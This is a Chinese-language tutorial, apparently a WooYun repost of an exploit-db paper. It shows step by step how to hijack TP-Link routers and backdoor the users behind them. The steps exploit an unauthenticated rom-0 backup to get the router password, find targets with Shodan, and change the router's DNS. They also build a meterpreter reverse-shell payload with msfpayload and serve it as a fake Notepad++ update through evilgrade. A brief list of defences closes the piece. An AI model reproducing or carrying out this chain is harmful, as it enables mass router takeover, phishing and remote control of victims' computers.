<span id="7ztzv"></span>
<sub id="7ztzv"></sub>

<span id="7ztzv"></span><form id="7ztzv"></form>

<span id="7ztzv"></span>

        <address id="7ztzv"></address>

            原文地址:http://drops.wooyun.org/tips/2552

            from: http://www.exploit-db.com/wp-content/themes/exploit/docs/33369.pdf

            0x00 工具


            一臺筆記本電腦 TD-W8901D路由器(firmware 6.0.0) 虛擬機(WIN7)、Kali Linux(攻擊機)、evilgrade(一個模塊化的腳本框架,可實現偽造的升級、自帶DNS和WEB服務模塊,http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt) Metasploit。

            0x01 示例


            互聯網攻擊示意圖:

            enter image description here

            局域網攻擊示意圖

            enter image description here

            市場上有很多類型的路由器可用,但絕大部分從未升級固件,所以可對大多數家用路由進行這個攻擊,在這個項目中使用的是最常見的TPlink路由器。

            TPLINK某些版本有一個關鍵的漏洞:未授權訪問Firmware/Romfile界面,無需登陸密碼,像這樣http://IP//rpFWUpload.html。

            同時也可以下載romfile備份文件(rom-0),像這樣:http://IP address/rom-0。

            步驟一:下載rom文件 enter image description here

            下載回來的rom文件需要逆向工程得到明文密碼,但有一個更簡單的方法,去俄羅斯的一個網站可以解密 http://www.hakim.ws/huawei/rom-0/

            步驟二:使用賬號密碼登陸 enter image description here

            第三步:使用搜索引擎SHODAN 搜索RomPager,可在互聯網上找到700多萬個這種設備 enter image description here

            簡單的改變一下路由器的DNS,就可以重定向用戶的請求,這個方法可以用來釣魚(從我了解的情況看來,國內已經有大批路由被利用,并已經被黑產用作釣魚欺詐,黑產表打我,我猜的)。但這個太簡單了,作者希望玩的更高(hua)深(shao)一些。

            默認DNS的配置是這樣: enter image description here

            改成攻擊者自己的DNS:

            enter image description here

            攻擊系統:DNS服務器一臺、kali預裝了evilgrade 和metasploit。

            enter image description here

            第五步:建一個帶后門的payload,給用戶發送升級指令。LHOST= 攻擊者機器IP和 LPORT =任何開放的端口。

            Commad:@@# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.5.132 LPORT=8080 x > navebackdoor.exe 
            

            2014071323521922657.jpg

            第六步:啟動metasploit、運行payload

            2014071323523583152.jpg

            ? 2014071323530565178.jpg

            2014071323531775176.jpg

            第七步:設置監聽主機和監聽端口,命令:set LHOST(攻擊者的IP)、set LPORT(監聽端口,創建后門時分配的)、exploit(進行攻擊)

            2014071323533763041.jpg

            第八步:啟動假的WEB升級服務器evilgrade,執行show modules后,可以看到很多假更新模塊,這里選用notepadplus

            2014071323535610035.jpg

            2014071323541051845.jpg

            2014071323542812615.jpg

            第九步:show options可以看到模塊的使用方法,設置后門升級文件路徑使用agent:

            Set ?agent ?‘[“<%OUT%>/root/Desktop/navebackdoor.exe<%OUT%>”]’ 
            

            2014071323544287175.jpg

            第十步:完成以上動作后,啟動EvilGrade的WEB服務器:

            start
            

            2014071323550126547.jpg

            第十一步:等受害者打開notepadplus,一旦打開就會彈出要求更新的提示,更新過程中將會加載我們的后門程序。

            2014071323551940538.jpg

            2014071323553365266.jpg

            第十二步:在攻擊機器上,evilgrade和Metasploit建立會話,等待返回的shell

            2014071323554774816.jpg

            第十三步:拿到shell,使用sysinfo查看一下:

            2014071323560039521.jpg

            輸入help可以看到很多命令,包括scrrenshot、killav,運行vnc 等

            2014071323561637433.jpg

            2014071323563672357.jpg

            0x02 防御方法


            經常升級你的路由器版本

            路由器不要在公網暴露

            系統和軟件升級時檢查證書

            設置靜態IP,比如google的8.8.8.8、8.8.4.4(廣告:阿里巴巴的公共dns 223.5.5.5 和 223.6.6.6)

            <span id="7ztzv"></span>
            <sub id="7ztzv"></sub>

            <span id="7ztzv"></span><form id="7ztzv"></form>

            <span id="7ztzv"></span>

                  <address id="7ztzv"></address>

                      亚洲欧美在线